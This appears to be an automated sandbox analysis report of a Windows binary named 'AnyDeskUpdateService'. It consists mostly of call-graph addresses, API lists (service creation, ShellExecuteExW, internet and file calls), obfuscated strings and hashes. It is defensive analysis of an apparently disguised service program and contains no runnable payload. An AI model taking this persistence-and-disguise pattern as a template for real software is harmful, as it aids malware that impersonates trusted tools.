_set_fmode 5 API calls 23418->23421 23419 7ff71ddab1d8 __free_lconv_mon 5 API calls 23419->23417 23422 7ff71dda3630 23420->23422 23423 7ff71dda35af 23421->23423 23422->23288 23424 7ff71dda35d4 23423->23424 23425 7ff71dda35cb 23423->23425 23427 7ff71dda4bc4 _set_fmode 5 API calls 23424->23427 23426 7ff71dda4bc4 _set_fmode 5 API calls 23425->23426 23426->23433 23428 7ff71dda35d9 23427->23428 23429 7ff71dda35f6 23428->23429 23430 7ff71dda4bc4 _set_fmode 5 API calls 23428->23430 23431 7ff71dda4bc4 _set_fmode 5 API calls 23429->23431 23432 7ff71dda35e3 23430->23432 23431->23433 23432->23429 23434 7ff71dda35e8 23432->23434 23433->23414 23435 7ff71ddab1d8 __free_lconv_mon 5 API calls 23434->23435 23435->23417 23439 7ff71dd8fd01 23436->23439 23437 7ff71dd8fe11 23637 7ff71dd814e0 24 API calls 23437->23637 23439->23437 23441 7ff71dd8fd29 ctype 23439->23441 23442 7ff71dd8fdc1 23439->23442 23443 7ff71dd8fd6d 23439->23443 23447 7ff71dd8fd82 23439->23447 23441->23292 23445 7ff71dd979bc std::_Facet_Register 24 API calls 23442->23445 23446 7ff71dd979bc std::_Facet_Register 24 API calls 23443->23446 23443->23447 23445->23441 23446->23447 23447->23441 23636 7ff71dd81440 24 API calls 2 library calls 23447->23636 23449 7ff71dd979bc std::_Facet_Register 24 API calls 23448->23449 23450 7ff71dd8f62a 23449->23450 23638 7ff71dd950dc 23450->23638 23453 7ff71dd91ef0 47 API calls 23454 7ff71dd8f657 23453->23454 23455 7ff71dd8f675 23454->23455 23459 7ff71dd8f8e8 23454->23459 23456 7ff71dd979bc std::_Facet_Register 24 API calls 23455->23456 23457 7ff71dd8f6f5 23456->23457 23458 7ff71dd950dc 28 API calls 23457->23458 23460 7ff71dd8f6ff 23458->23460 23462 7ff71dd82660 47 API calls 23459->23462 23647 7ff71dd96c78 23460->23647 23464 7ff71dd8f928 23462->23464 23466 7ff71dd995e4 Concurrency::cancel_current_task RtlPcToFileHeader 23464->23466 23465 7ff71dd8f789 23655 7ff71dd9d8bc 23 API calls 2 library calls 23465->23655 23469 7ff71dd8f8b9 23466->23469 23468 7ff71dd8f7f7 _RTC_Initialize 23656 7ff71dd92740 43 API calls 5 library calls 23468->23656 23471 7ff71dd82660 47 API calls 23469->23471 23475 7ff71dd8f85c _RTC_Initialize 23469->23475 23472 7ff71dd8f97d 23471->23472 23473 7ff71dd995e4 Concurrency::cancel_current_task RtlPcToFileHeader 23472->23473 23474 7ff71dd8f98e 23473->23474 23475->23311 23477 7ff71dd920d0 _RTC_Initialize 23476->23477 23478 7ff71dd91c30 47 API calls 23477->23478 23482 7ff71dd92125 _RTC_Initialize 23477->23482 23478->23482 23479 7ff71dd92316 23484 7ff71dd82660 47 API calls 23479->23484 23480 7ff71dd922e2 _RTC_Initialize 23480->23314 23481 7ff71dd922d1 23481->23480 23847 7ff71dd91d70 47 API calls 2 library calls 23481->23847 23482->23479 23482->23481 23485 7ff71dd92358 23484->23485 23486 7ff71dd995e4 Concurrency::cancel_current_task RtlPcToFileHeader 23485->23486 23487 7ff71dd92369 23486->23487 23488 7ff71dd91ef0 47 API calls 23487->23488 23489 7ff71dd9238a 23488->23489 23490 7ff71dd943e0 47 API calls 23489->23490 23491 7ff71dd92395 23490->23491 23492 7ff71dd91c30 47 API calls 23491->23492 23493 7ff71dd9239d 23492->23493 23493->23314 23848 7ff71dd91220 23494->23848 23496 7ff71dd82ed8 23546 7ff71dd8f4b0 43 API calls 23496->23546 23497 7ff71dd8f422 23497->23496 23498 7ff71dd82660 47 API calls 23497->23498 23499 7ff71dd8f496 23498->23499 23500 7ff71dd995e4 Concurrency::cancel_current_task RtlPcToFileHeader 23499->23500 23501 7ff71dd8f4a7 23500->23501 23503 7ff71dd87c01 23502->23503 23504 7ff71dd87a6f 23502->23504 23505 7ff71dd8fcd0 24 API calls 23503->23505 23508 7ff71dd929a0 47 API calls 23504->23508 23506 7ff71dd87ce4 23505->23506 23865 7ff71dd81260 23506->23865 23510 7ff71dd87b98 __vcrt_getptd_noinit 23508->23510 23512 7ff71dd81150 41 API calls 23510->23512 23511 7ff71dd87e22 CreateServiceW 23515 7ff71dd87f6b 23511->23515 23516 7ff71dd87e89 23511->23516 23514 7ff71dd87bbe 23512->23514 23513 7ff71dd87d24 23513->23513 23518 7ff71dd929a0 47 API calls 23513->23518 23519 7ff71dd87bfc 23514->23519 23532 7ff71dd880c9 23514->23532 23515->23515 23521 7ff71dd929a0 47 API calls 23515->23521 23516->23516 23522 7ff71dd929a0 47 API calls 23516->23522 23517 7ff71dd976f0 codecvt 4 API calls 23520 7ff71dd880ac 23517->23520 23523 7ff71dd87db9 __vcrt_getptd_noinit 23518->23523 23519->23517 23520->23353 23524 7ff71dd87ff9 23521->23524 23525 7ff71dd87ef8 __vcrt_getptd_noinit 23522->23525 23527 7ff71dd81150 41 API calls 23523->23527 23869 7ff71dd81150 23524->23869 23530 7ff71dd81150 41 API calls 23525->23530 23527->23514 23528 7ff71dd88013 23529 7ff71dd8804e CloseServiceHandle CloseServiceHandle 23528->23529 23528->23532 23529->23514 23531 7ff71dd87f1e CloseServiceHandle 23530->23531 23531->23514 23533 7ff71dd880e6 RegisterServiceCtrlHandlerW 23532->23533 23534 7ff71dd88407 SetServiceStatus CreateEventW 23533->23534 23535 7ff71dd88137 23533->23535 23536 7ff71dd8846f SetServiceStatus CreateThread 23534->23536 23537 7ff71dd884c8 __vcrt_getptd_noinit 23534->23537 23540 7ff71dd8fcd0 24 API calls 23535->23540 23536->23537 23544 7ff71dd883be 23536->23544 23538 7ff71dd884ce SetServiceStatus 23537->23538 23538->23544 23539 7ff71dd976f0 codecvt 4 API calls 23542 7ff71dd8850f 23539->23542 23541 7ff71dd883ab 23540->23541 23873 7ff71dd885f0 27 API calls 2 library calls 23541->23873 23542->23353 23544->23539 23545 7ff71dd88520 23544->23545 23546->23294 23547->23333 23548->23322 23549->23350 23550->23352 23551->23378 23552->23380 23553->23388 23554->23390 23555->23392 23556->23356 23557->23360 23558->23366 23559->23368 23560->23370 23561->23363 23579 7ff71ddae77c 23562->23579 23564 7ff71dda354b 23564->23409 23564->23410 23564->23411 23566 7ff71ddaf490 23565->23566 23567 7ff71ddaf49a 23565->23567 23596 7ff71ddaf3c8 24 API calls 5 library calls 23566->23596 23597 7ff71dda6178 23567->23597 23573 7ff71ddaf4d2 23606 7ff71dda6af4 23573->23606 23575 7ff71ddaf52e 23577 7ff71dda356d 23575->23577 23578 7ff71ddab1d8 __free_lconv_mon 5 API calls 23575->23578 23577->23419 23578->23577 23582 7ff71ddae7a8 23579->23582 23580 7ff71ddae7b0 23581 7ff71dda4bc4 _set_fmode 5 API calls 23580->23581 23583 7ff71ddae7b5 23581->23583 23582->23580 23584 7ff71ddae7d3 23582->23584 23593 7ff71dda4a58 23 API calls _invalid_parameter_noinfo 23583->23593 23594 7ff71ddae870 41 API calls 23584->23594 23587 7ff71ddae7c1 23587->23564 23588 7ff71ddae7db 23588->23587 23589 7ff71ddae819 23588->23589 23590 7ff71ddae809 23588->23590 23595 7ff71dda9a04 23 API calls 2 library calls 23589->23595 23591 7ff71dda4bc4 _set_fmode 5 API calls 23590->23591 23591->23587 23593->23587 23594->23588 23595->23587 23596->23577 23598 7ff71dda619c 23597->23598 23604 7ff71dda6197 23597->23604 23598->23604 23628 7ff71ddaab80 23 API calls 4 library calls 23598->23628 23600 7ff71dda61b7 23629 7ff71ddacfc8 23 API calls _Getctype 23600->23629 23602 7ff71dda61da 23630 7ff71ddad034 23 API calls TranslateName 23602->23630 23604->23573 23605 7ff71ddab4e8 GetProcAddress __crtLCMapStringW 23604->23605 23605->23573 23607 7ff71dda6b42 23606->23607 23608 7ff71dda6b1e 23606->23608 23609 7ff71dda6b47 23607->23609 23610 7ff71dda6b9c 23607->23610 23612 7ff71ddab1d8 __free_lconv_mon 5 API calls 23608->23612 23614 7ff71dda6b2d 23608->23614 23613 7ff71dda6b5c 23609->23613 23609->23614 23615 7ff71ddab1d8 __free_lconv_mon 5 API calls 23609->23615 23635 7ff71ddb2d98 MultiByteToWideChar 23610->23635 23612->23614 23631 7ff71ddacf68 23613->23631 23614->23575 23627 7ff71ddaf3c8 24 API calls 5 library calls 23614->23627 23615->23613 23627->23575 23628->23600 23629->23602 23630->23604 23633 7ff71ddacf77 std::_Facet_Register _Getctype 23631->23633 23632 7ff71dda4bc4 _set_fmode 5 API calls 23634 7ff71ddacfb1 23632->23634 23633->23632 23633->23634 23634->23614 23636->23437 23639 7ff71dd94c5c std::_Lockit::_Lockit 2 API calls 23638->23639 23640 7ff71dd950fe 23639->23640 23646 7ff71dd95121 ctype _RTC_Initialize 23640->23646 23657 7ff71dd952d4 24 API calls std::_Facet_Register 23640->23657 23642 7ff71dd94cd4 std::_Lockit::~_Lockit RtlLeaveCriticalSection 23644 7ff71dd8f634 23642->23644 23643 7ff71dd95116 23658 7ff71dd95304 24 API calls std::locale::_Setgloballocale 23643->23658 23644->23453 23646->23642 23648 7ff71dd96cbe 23647->23648 23654 7ff71dd8f77d 23648->23654 23659 7ff71dda5868 23648->23659 23652 7ff71dd96d0c 23652->23654 23679 7ff71dd9de30 23652->23679 23654->23465 23654->23469 23655->23468 23656->23475 23657->23643 23658->23646 23660 7ff71dda57ac 23659->23660 23661 7ff71dda57c9 23660->23661 23663 7ff71dda57f5 23660->23663 23662 7ff71dda4bc4 _set_fmode 5 API calls 23661->23662 23664 7ff71dda57ce 23662->23664 23665 7ff71dda5807 23663->23665 23666 7ff71dda57fa 23663->23666 23696 7ff71dda4a58 23 API calls _invalid_parameter_noinfo 23664->23696 23687 7ff71ddace08 23665->23687 23668 7ff71dda4bc4 _set_fmode 5 API calls 23666->23668 23670 7ff71dd96cf1 23668->23670 23670->23654 23678 7ff71dda4638 39 API calls _invalid_parameter_noinfo 23670->23678 23671 7ff71dda5811 23672 7ff71dda5828 23671->23672 23673 7ff71dda581b 23671->23673 23691 7ff71ddb1edc 23672->23691 23674 7ff71dda4bc4 _set_fmode 5 API calls 23673->23674 23674->23670 23676 7ff71dda583c 23697 7ff71dd9d910 RtlLeaveCriticalSection 23676->23697 23678->23652 23680 7ff71dd9de60 23679->23680 23833 7ff71dd9dd0c 23680->23833 23682 7ff71dd9de79 23683 7ff71dd9de9e 23682->23683 23843 7ff71dd9d5f4 23 API calls 3 library calls 23682->23843 23686 7ff71dd9deb3 23683->23686 23844 7ff71dd9d5f4 23 API calls 3 library calls 23683->23844 23686->23654 23688 7ff71ddace1f 23687->23688 23698 7ff71ddace7c 23688->23698 23690 7ff71ddace2a 23690->23671 23715 7ff71ddb1c18 23691->23715 23694 7ff71ddb1f36 23694->23676 23696->23670 23706 7ff71ddacead 23698->23706 23699 7ff71ddacf46 23699->23690 23700 7ff71ddacefc 23701 7ff71ddab160 _Getctype 5 API calls 23700->23701 23703 7ff71ddacf09 23701->23703 23704 7ff71ddab1d8 __free_lconv_mon 5 API calls 23703->23704 23705 7ff71ddacf13 23704->23705 23705->23699 23713 7ff71ddab7d4 GetProcAddress __crtLCMapStringW __vcrt_InitializeCriticalSectionEx 23705->23713 23706->23699 23706->23700 23706->23706 23711 7ff71dd9d904 RtlEnterCriticalSection 23706->23711 23712 7ff71dd9d910 RtlLeaveCriticalSection 23706->23712 23708 7ff71ddacf33 23714 7ff71dd9d904 RtlEnterCriticalSection 23708->23714 23713->23708 23720 7ff71ddb1c42 23715->23720 23716 7ff71dda4bc4 _set_fmode 5 API calls 23717 7ff71ddb1ebb 23716->23717 23733 7ff71dda4a58 23 API calls _invalid_parameter_noinfo 23717->23733 23719 7ff71ddb1dfe 23719->23694 23727 7ff71ddbad34 23719->23727 23725 7ff71ddb1df5 23720->23725 23730 7ff71ddba4bc 23 API calls 3 library calls 23720->23730 23722 7ff71ddb1e56 23722->23725 23731 7ff71ddba4bc 23 API calls 3 library calls 23722->23731 23724 7ff71ddb1e77 23724->23725 23732 7ff71ddba4bc 23 API calls 3 library calls 23724->23732 23725->23716 23725->23719 23734 7ff71ddba608 23727->23734 23729 7ff71ddbad61 23729->23694 23730->23722 23731->23724 23732->23725 23733->23719 23735 7ff71ddba61f 23734->23735 23737 7ff71ddba63d 23734->23737 23736 7ff71dda4bc4 _set_fmode 5 API calls 23735->23736 23739 7ff71ddba624 23736->23739 23737->23735 23738 7ff71ddba659 23737->23738 23743 7ff71ddbac18 23738->23743 23754 7ff71dda4a58 23 API calls _invalid_parameter_noinfo 23739->23754 23742 7ff71ddba630 23742->23729 23744 7ff71dda6178 TranslateName 23 API calls 23743->23744 23745 7ff71ddbac6b 23744->23745 23750 7ff71ddbac7b 23745->23750 23798 7ff71ddab4e8 GetProcAddress __crtLCMapStringW 23745->23798 23747 7ff71dda6af4 6 API calls 23748 7ff71ddbacd3 23747->23748 23749 7ff71ddbacd7 23748->23749 23755 7ff71ddbad68 23748->23755 23752 7ff71ddbad14 23749->23752 23753 7ff71ddab1d8 __free_lconv_mon 5 API calls 23749->23753 23750->23747 23752->23742 23753->23752 23754->23742 23799 7ff71ddba94c 23755->23799 23757 7ff71ddbadaf 23758 7ff71ddbadf5 23757->23758 23759 7ff71ddbaddd 23757->23759 23815 7ff71ddb506c 23758->23815 23822 7ff71dda4ba4 23759->23822 23762 7ff71ddbadfa 23763 7ff71ddbae01 23762->23763 23764 7ff71ddbae1a CreateFileW 23762->23764 23767 7ff71dda4ba4 _fread_nolock 5 API calls 23763->23767 23765 7ff71ddbaf00 GetFileType 23764->23765 23768 7ff71ddbae85 23764->23768 23770 7ff71ddbaf5e 23765->23770 23771 7ff71ddbaf0d __vcrt_getptd_noinit 23765->23771 23766 7ff71dda4bc4 _set_fmode 5 API calls 23769 7ff71ddbadee 23766->23769 23772 7ff71ddbae06 23767->23772 23773 7ff71ddbae93 CreateFileW 23768->23773 23774 7ff71ddbaecd __vcrt_getptd_noinit 23768->23774 23769->23749 23827 7ff71ddb4f84 6 API calls 2 library calls 23770->23827 23826 7ff71dda4b38 5 API calls 2 library calls 23771->23826 23775 7ff71dda4bc4 _set_fmode 5 API calls 23772->23775 23773->23765 23773->23774 23825 7ff71dda4b38 5 API calls 2 library calls 23774->23825 23776 7ff71ddbade2 23775->23776 23776->23766 23780 7ff71ddbaf80 23782 7ff71ddbafd4 23780->23782 23828 7ff71ddbab54 41 API calls 2 library calls 23780->23828 23781 7ff71ddbaf1c CloseHandle 23781->23776 23783 7ff71ddbaf4e 23781->23783 23790 7ff71ddbafdb 23782->23790 23830 7ff71ddba6cc 40 API calls 2 library calls 23782->23830 23784 7ff71dda4bc4 _set_fmode 5 API calls 23783->23784 23787 7ff71ddbaf53 23784->23787 23787->23776 23788 7ff71ddbb012 23789 7ff71ddbb021 23788->23789 23788->23790 23789->23769 23792 7ff71ddbb0a0 CloseHandle CreateFileW 23789->23792 23829 7ff71ddacca0 25 API calls _invalid_parameter_noinfo 23790->23829 23793 7ff71ddbb115 23792->23793 23794 7ff71ddbb0e7 __vcrt_getptd_noinit 23792->23794 23793->23769 23831 7ff71dda4b38 5 API calls 2 library calls 23794->23831 23796 7ff71ddbb0f4 23832 7ff71ddb51ac 6 API calls 2 library calls 23796->23832 23798->23750 23800 7ff71ddba978 23799->23800 23807 7ff71ddba992 23799->23807 23801 7ff71dda4bc4 _set_fmode 5 API calls 23800->23801 23800->23807 23802 7ff71ddba987 23801->23802 23803 7ff71dda4a58 _invalid_parameter_noinfo 23 API calls 23802->23803 23803->23807 23804 7ff71ddbaa61 23806 7ff71dda7960 23 API calls 23804->23806 23811 7ff71ddbaaba 23804->23811 23805 7ff71ddbaa10 23805->23804 23808 7ff71dda4bc4 _set_fmode 5 API calls 23805->23808 23806->23811 23807->23805 23809 7ff71dda4bc4 _set_fmode 5 API calls 23807->23809 23810 7ff71ddbaa56 23808->23810 23812 7ff71ddbaa05 23809->23812 23813 7ff71dda4a58 _invalid_parameter_noinfo 23 API calls 23810->23813 23811->23757 23814 7ff71dda4a58 _invalid_parameter_noinfo 23 API calls 23812->23814 23813->23804 23814->23805 23819 7ff71ddb508f 23815->23819 23816 7ff71ddb50bd 23816->23762 23817 7ff71ddb50b8 23818 7ff71ddb4dbc 6 API calls 23817->23818 23818->23816 23819->23816 23819->23817 23820 7ff71ddb510e RtlEnterCriticalSection 23819->23820 23820->23816 23821 7ff71ddb511d RtlLeaveCriticalSection 23820->23821 23821->23819 23823 7ff71ddaacf8 _set_fmode 5 API calls 23822->23823 23824 7ff71dda4bad 23823->23824 23824->23776 23825->23776 23826->23781 23827->23780 23828->23782 23829->23769 23830->23788 23831->23796 23832->23793 23834 7ff71dd9dd27 23833->23834 23836 7ff71dd9dd55 23833->23836 23846 7ff71dda498c 23 API calls 2 library calls 23834->23846 23838 7ff71dd9dd47 23836->23838 23845 7ff71dd9d904 RtlEnterCriticalSection 23836->23845 23838->23682 23839 7ff71dd9dd6c 23840 7ff71dd9dd88 38 API calls 23839->23840 23841 7ff71dd9dd78 23840->23841 23842 7ff71dd9d910 _fread_nolock RtlLeaveCriticalSection 23841->23842 23842->23838 23843->23683 23844->23686 23846->23838 23847->23480 23849 7ff71dd91290 23848->23849 23850 7ff71dd91240 23848->23850 23849->23497 23854 7ff71dd91120 23850->23854 23852 7ff71dd9127a 23853 7ff71dd9de30 40 API calls 23852->23853 23853->23849 23855 7ff71dd91200 23854->23855 23856 7ff71dd91143 23854->23856 23857 7ff71dd976f0 codecvt 4 API calls 23855->23857 23856->23855 23861 7ff71dd9114d _RTC_Initialize 23856->23861 23858 7ff71dd9120f 23857->23858 23858->23852 23859 7ff71dd9119f 23860 7ff71dd976f0 codecvt 4 API calls 23859->23860 23862 7ff71dd911bc 23860->23862 23861->23859 23864 7ff71dda39fc 41 API calls _invalid_parameter_noinfo 23861->23864 23862->23852 23864->23859 23866 7ff71dd8127d OpenSCManagerW 23865->23866 23867 7ff71dd81291 23865->23867 23866->23511 23866->23513 23874 7ff71dd812b0 24 API calls 23867->23874 23870 7ff71dd8117d 23869->23870 23875 7ff71dda2f1c 23870->23875 23873->23544 23874->23866 23876 7ff71dda2f46 23875->23876 23877 7ff71dda2f7e 23876->23877 23879 7ff71dda2fb1 23876->23879 23893 7ff71dda498c 23 API calls 2 library calls 23877->23893 23886 7ff71dd9e340 23879->23886 23881 7ff71dda2fa7 23882 7ff71dda301b 23881->23882 23894 7ff71dd9d5f4 23 API calls 3 library calls 23881->23894 23883 7ff71dd8119b 23882->23883 23895 7ff71dd9d5f4 23 API calls 3 library calls 23882->23895 23883->23528 23896 7ff71dd9d904 RtlEnterCriticalSection 23886->23896 23888 7ff71dd9e35d 23889 7ff71dda0434 39 API calls 23888->23889 23890 7ff71dd9e366 23889->23890 23891 7ff71dd9d910 _fread_nolock RtlLeaveCriticalSection 23890->23891 23892 7ff71dd9e370 23891->23892 23892->23881 23893->23881 23894->23882 23895->23883 24091 7ff71dd97a30 30 API calls 2 library calls 24172 7ff71dd91430 24 API calls 24093 7ff71dd81a30 47 API calls

                                                                                                      Executed Functions

                                                                                                      Function 00007FF71DD82840 Relevance: 92.7, APIs: 16, Strings: 35, Instructions: 3486filestringsynchronizationCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 0 7ff71dd82840-7ff71dd82d7b call 7ff71dd8fb30 call 7ff71dd8fe90 call 7ff71dd8fe20 call 7ff71dda3510 call 7ff71dd8fae0 call 7ff71dd8fe90 call 7ff71dd8f9f0 call 7ff71dd8fcd0 call 7ff71dd8fbc0 GetFileAttributesW 19 7ff71dd82d7d-7ff71dd82d7f 0->19 20 7ff71dd82d85-7ff71dd82dba call 7ff71dd8fe20 call 7ff71dd8f530 0->20 19->20 21 7ff71dd82ef1-7ff71dd84ae8 call 7ff71dd8e410 call 7ff71dd8fcd0 call 7ff71dd8e3b0 call 7ff71dd8fcd0 call 7ff71dd8e370 call 7ff71dd8fcd0 call 7ff71dd8e330 call 7ff71dd8fcd0 call 7ff71dd8e130 call 7ff71dd8fcd0 call 7ff71dd8e010 call 7ff71dd8fcd0 call 7ff71dd8dfd0 call 7ff71dd8fcd0 call 7ff71dd8fbc0 GetFileAttributesW 19->21 30 7ff71dd82dc0-7ff71dd82eca call 7ff71dd91080 * 8 call 7ff71dd8e440 call 7ff71dd920a0 * 2 call 7ff71dd8f990 20->30 31 7ff71dd82ecf-7ff71dd82ed3 call 7ff71dd8f410 20->31 86 7ff71dd84aea-7ff71dd84aec 21->86 87 7ff71dd84af2-7ff71dd85089 call 7ff71dd8d350 call 7ff71dd8fcd0 call 7ff71dd8fbc0 * 2 call 7ff71dd8cdf0 InternetCloseHandle call 7ff71dd8fc60 21->87 30->31 37 7ff71dd82ed8-7ff71dd82eec call 7ff71dd8f4b0 call 7ff71dd8f9d0 31->37 37->21 86->87 88 7ff71dd8508e-7ff71dd850a6 call 7ff71dd8fbc0 GetFileAttributesW 86->88 87->88 95 7ff71dd850a8-7ff71dd850aa 88->95 96 7ff71dd850d3-7ff71dd8512b call 7ff71dd8fbc0 GetFileAttributesW 88->96 95->96 99 7ff71dd850ac-7ff71dd850cd call 7ff71dd8fbc0 * 2 MoveFileW 95->99 104 7ff71dd8512d-7ff71dd8512f 96->104 105 7ff71dd85135-7ff71dd85710 call 7ff71dd91e20 call 7ff71dd91070 * 7 call 7ff71dd8d2c0 call 7ff71dd8fcd0 call 7ff71dd8fbc0 * 2 call 7ff71dd8cdf0 call 7ff71dd8cf30 call 7ff71dd8fc60 96->105 99->96 104->105 108 7ff71dd85712 104->108 113 7ff71dd85715-7ff71dd8572d call 7ff71dd8fbc0 GetFileAttributesW 105->113 108->113 121 7ff71dd85737-7ff71dd86b2c call 7ff71dd91000 * 145 call 7ff71dd8df90 call 7ff71dd8fcd0 call 7ff71dd8fbc0 * 2 call 7ff71dd8cdf0 call 7ff71dd8cf30 call 7ff71dd91030 * 17 call 7ff71dd8df60 call 7ff71dd8fcd0 call 7ff71dd8fbc0 * 3 ShellExecuteExW 113->121 122 7ff71dd8572f-7ff71dd85731 113->122 748 7ff71dd86b32-7ff71dd86d5a call 7ff71ddc0050 call 7ff71dd91010 * 3 call 7ff71dd91060 * 15 call 7ff71dd8cf50 call 7ff71dd8df20 call 7ff71dd923b0 call 7ff71dd8dbc0 call 7ff71dd923b0 call 7ff71dd8df10 121->748 749 7ff71dd86d5f-7ff71dd86d8d WaitForSingleObject CloseHandle call 7ff71dd8fc60 * 2 121->749 122->121 124 7ff71dd86d92-7ff71dd86e85 call 7ff71dd8d200 call 7ff71dd8fcd0 call 7ff71dd8fbc0 lstrcmpiW 122->124 145 7ff71dd86e87 call 7ff71dd87a20 124->145 146 7ff71dd86e91-7ff71dd870ca GetCurrentProcessId call 7ff71dd81500 call 7ff71dd91010 * 15 call 7ff71dd8d090 call 7ff71dd8fcd0 call 7ff71dd8fbd0 call 7ff71dd8fbc0 * 3 ShellExecuteExW 124->146 153 7ff71dd86e8c 145->153 281 7ff71dd8730a-7ff71dd87334 StartServiceCtrlDispatcherW 146->281 282 7ff71dd870d0-7ff71dd87305 call 7ff71ddc0050 call 7ff71dd91010 * 18 call 7ff71dd8cf50 call 7ff71dd8d090 call 7ff71dd923b0 call 7ff71dd8dbc0 call 7ff71dd923b0 call 7ff71dd8df10 146->282 157 7ff71dd878b5-7ff71dd87974 call 7ff71dd8fc60 * 9 call 7ff71dd8fe30 * 2 call 7ff71dd976f0 153->157 285 7ff71dd8789b-7ff71dd878b4 call 7ff71dd8fc60 * 2 281->285 286 7ff71dd8733a-7ff71dd8789a call 7ff71dd91050 * 53 call 7ff71dd8db30 call 7ff71dd8fcd0 call 7ff71dd8fbc0 call 7ff71dd885f0 call 7ff71dd8fc60 281->286 282->281 285->157 286->285 748->749 749->124
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000019.00000002.2253430601.00007FF71DD81000.00000040.00000001.01000000.00000008.sdmp, Offset: 00007FF71DD80000, based on PE: true
                                                                                                      • Associated: 00000019.00000002.2253409830.00007FF71DD80000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253430601.00007FF71DDD3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253430601.00007FF71DDDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253514569.00007FF71DDDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000019.00000002.2253531400.00007FF71DDDD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_25_2_7ff71dd80000_AnyDeskUpdateService.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: File$Internet$Attributesstd::_$CloseHandleLockit$ErrorEventLast$ExecuteLockit::_Lockit::~_OpenReadRegisterShellSource$Concurrency::cancel_current_taskCreateCtrlCurrentDeregisterDispatcherFacet_MoveObjectProcessReportServiceSingleStartWaitWritelstrcmpi
                                                                                                      • String ID: $x'x$%x*x$&x>x$)nln$,x'x$-x?x$.x5x$0r!r$20240913$3x9x$4x<x$5x=x$:r>r$:xyx$AnyDeskUpdateService$GY!Y$H}wM$M$NYOY$Nr<r$Qx$x$enfn$h1w{$jnhn$jxWx$pH}wM$sncn$t$ux(x$vzv$$w$wnmn$xx~x$}Y>Y$}wM
                                                                                                      • API String ID: 2766441065-4267904903
                                                                                                      • Opcode ID: c718f0704d29a904090881f6a353c4df41576d63dd8bb5b8d9f832d7076f5b72
                                                                                                      • Instruction ID: 45397506b2542b497ff831494f8866c49df416c9cfeb3b15e7c6f10426e87ba4
                                                                                                      • Opcode Fuzzy Hash: c718f0704d29a904090881f6a353c4df41576d63dd8bb5b8d9f832d7076f5b72
                                                                                                      • Instruction Fuzzy Hash: E0936E1552C6D689E330AF71D8103FA7261EF58718F81003BD28C8BAA9FF3D9649DB65
                                                                                                      Function 00007FF71DD87A20 Relevance: 42.6, APIs: 16, Strings: 8, Instructions: 627serviceregistrythreadCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 802 7ff71dd87a20-7ff71dd87a69 GetModuleFileNameW 803 7ff71dd87c01-7ff71dd87d1e call 7ff71dd8fcd0 call 7ff71dd81260 OpenSCManagerW 802->803 804 7ff71dd87a6f-7ff71dd87b7a 802->804 813 7ff71dd87d24-7ff71dd87d6b 803->813 814 7ff71dd87e22-7ff71dd87e83 CreateServiceW 803->814 806 7ff71dd87b80-7ff71dd87b88 804->806 806->806 808 7ff71dd87b8a-7ff71dd87bc6 call 7ff71dd929a0 call 7ff71ddc0050 call 7ff71dd81150 806->808 828 7ff71dd8809d-7ff71dd880c8 call 7ff71dd976f0 808->828 829 7ff71dd87bcc-7ff71dd87bdd 808->829 818 7ff71dd87d70-7ff71dd87d80 813->818 816 7ff71dd87f6b-7ff71dd87fad 814->816 817 7ff71dd87e89-7ff71dd87ea9 814->817 820 7ff71dd87fb0-7ff71dd87fc0 816->820 821 7ff71dd87eb0-7ff71dd87ebc 817->821 818->818 822 7ff71dd87d82-7ff71dd87d9a 818->822 820->820 824 7ff71dd87fc2-7ff71dd87fda 820->824 821->821 825 7ff71dd87ebe-7ff71dd87ed9 821->825 826 7ff71dd87da1-7ff71dd87da9 822->826 830 7ff71dd87fe1-7ff71dd87fe9 824->830 831 7ff71dd87ee0-7ff71dd87ee8 825->831 826->826 832 7ff71dd87dab-7ff71dd87de7 call 7ff71dd929a0 call 7ff71ddc0050 call 7ff71dd81150 826->832 833 7ff71dd88098 call 7ff71dd97710 829->833 834 7ff71dd87be3-7ff71dd87bf6 829->834 830->830 836 7ff71dd87feb-7ff71dd8800e call 7ff71dd929a0 call 7ff71dd81150 830->836 831->831 837 7ff71dd87eea-7ff71dd87f2f call 7ff71dd929a0 call 7ff71ddc0050 call 7ff71dd81150 CloseServiceHandle 831->837 866 7ff71dd87ded-7ff71dd87dfe 832->866 867 7ff71dd88061-7ff71dd88069 832->867 833->828 839 7ff71dd87bfc 834->839 840 7ff71dd880cf-7ff71dd880d4 call 7ff71dda4a78 834->840 856 7ff71dd88013-7ff71dd8801b 836->856 837->867 870 7ff71dd87f35-7ff71dd87f46 837->870 839->833 855 7ff71dd880d5-7ff71dd880da call 7ff71dda4a78 840->855 875 7ff71dd880db-7ff71dd880e0 call 7ff71dda4a78 855->875 858 7ff71dd8804e-7ff71dd88060 CloseServiceHandle * 2 856->858 859 7ff71dd8801d-7ff71dd8802e 856->859 858->867 863 7ff71dd88049 call 7ff71dd97710 859->863 864 7ff71dd88030-7ff71dd88043 859->864 863->858 864->863 869 7ff71dd880e1-7ff71dd88131 call 7ff71dda4a78 RegisterServiceCtrlHandlerW 864->869 872 7ff71dd87e04-7ff71dd87e17 866->872 873 7ff71dd87f61-7ff71dd87f66 call 7ff71dd97710 866->873 867->828 874 7ff71dd8806b-7ff71dd88081 867->874 886 7ff71dd88407-7ff71dd8846d SetServiceStatus CreateEventW 869->886 887 7ff71dd88137-7ff71dd8838d 869->887 870->873 876 7ff71dd87f48-7ff71dd87f5b 870->876 872->855 877 7ff71dd87e1d 872->877 873->867 874->833 879 7ff71dd88083-7ff71dd88096 874->879 875->869 876->873 876->875 877->873 879->833 883 7ff71dd880c9-7ff71dd880ce call 7ff71dda4a78 879->883 883->840 889 7ff71dd8846f-7ff71dd884c6 SetServiceStatus CreateThread 886->889 890 7ff71dd884c8-7ff71dd884fd call 7ff71ddc0050 